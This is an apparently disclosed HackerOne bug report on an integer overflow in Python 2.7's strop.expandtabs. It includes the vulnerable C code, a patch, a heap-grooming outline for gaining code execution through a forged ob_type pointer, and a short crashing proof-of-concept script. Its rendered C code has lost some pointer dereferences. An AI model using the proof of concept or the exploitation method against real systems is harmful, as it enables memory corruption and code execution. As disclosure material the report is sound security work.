Python (IBB): Integer overflow in strop.expandtabs

2014-03-31T00:09:44
ID H1:6389
Type hackerone
Reporter ianbeer
Modified 2014-03-31T00:09:44

Description

This issue was originally disclosed directly to the Python Security Response Team

Here's a bug in a string handling function which might be reachable in some "sandboxed python" environments, and maybe (at a stretch) remotely if someone were to offer "expanding-tabs-in-strings"-as-a-service...

Bug:

Modules/stropmodule.c

``` static PyObject * strop_expandtabs(PyObject self, PyObject args) ... i = j = old_j = 0; e = string + stringlen; for (p = string; p < e; p++) { if (p == '\t') { j += tabsize - (j%tabsize); if (old_j > j) { PyErr_SetString(PyExc_OverflowError, "new string is too long"); return NULL; } old_j = j; } else { j++; if (p == '\n') { i += j; <-- missing check here j = 0; } } } ... out = PyString_FromStringAndSize(NULL, i+j); ... i = 0; q = PyString_AS_STRING(out);

for (p = string; p < e; p++) { if (p == '\t') { j = tabsize - (i%tabsize); i += j; while (j-- > 0) q++ = ' '; } else { q++ = p; i++; if (*p == '\n') i = 0; } } ... ```

There's no check preventing i from overflowing, meaning that a string consisting of multiple tabs spread over multiple lines combined with a large tabsize can cause the allocation of an undersized string buffer.

With some simple heap manipulation the length of the copy into this buffer can be controlled, and it's pretty easy to corrupt memory in such a way as to gain native code execution:

[h1|----------][h2|\t\n\t\n....][h3|----------]

h1: PyStringObject header of undersized buffer h2: PyStringObject header of tabstring

By grooming the heap such that this allocation pattern is achieved when the expandtabs function starts expanding the h2 string into the h1 inline buffer it will overflow into the string being expanded, overwriting the tabs in the original string with spaces so that the second loop won't expand them anymore.

By carefully crafting the string to expand and choosing the tabsize you can limit the extent of the memory corruption to chosen objects.

Getting code execution is simply a matter of pointing the ob_type field of the h2 string header to a controlled address with a fake struct _typeobject. The struct contains the following function pointers which will be called when their corresponing python function is called:

destructor tp_dealloc; printfunc tp_print; getattrfunc tp_getattr; setattrfunc tp_setattr; cmpfunc tp_compare; reprfunc tp_repr;

Patch:

You've actually already patched this bug in a copy-and-paste version of this function... In fact there seem to be at least three versions of expandtabs; transmogrify.h and stropmodule.c are both vulnerable; stringobject.c isn't. I'm not familiar enough with the code to know when each version will be used.

The patch is to use the stringobject.c implementation which does the overflow check correctly, but here's a quick patch (for the 2.7 branch) which will do the job:

--- a/Modules/stropmodule.c Sun Mar 30 16:43:11 2014 -0400 +++ b/Modules/stropmodule.c Mon Mar 31 00:36:57 2014 +0200 @@ -624,6 +624,11 @@ } else { j++; if (*p == '\n') { + if (i &gt; PY_SSIZE_T_MAX - j){ + PyErr_SetString(PyExc_OverflowError, + "new string is too long"); + return NULL; + } i += j; j = 0; }

Proof of Concept

Run this script for a very simple crashing PoC for 32-bit python 2.7 which should crash at at address near 0x20202020 (since the ob_type field will be overwritten with spaces.) No idea if the heap manipulation used here will work on other platforms but it should be easy to do.

```lang=python import strop

strs = [] for i in range(20): strs.append('\t\n' * 0x10000 + 'A' * 0x1000000) for i in range(20): print hex(id(strs[i])) strs[14] = None strop.expandtabs(strs[15], 0x10001) print strs[15] ```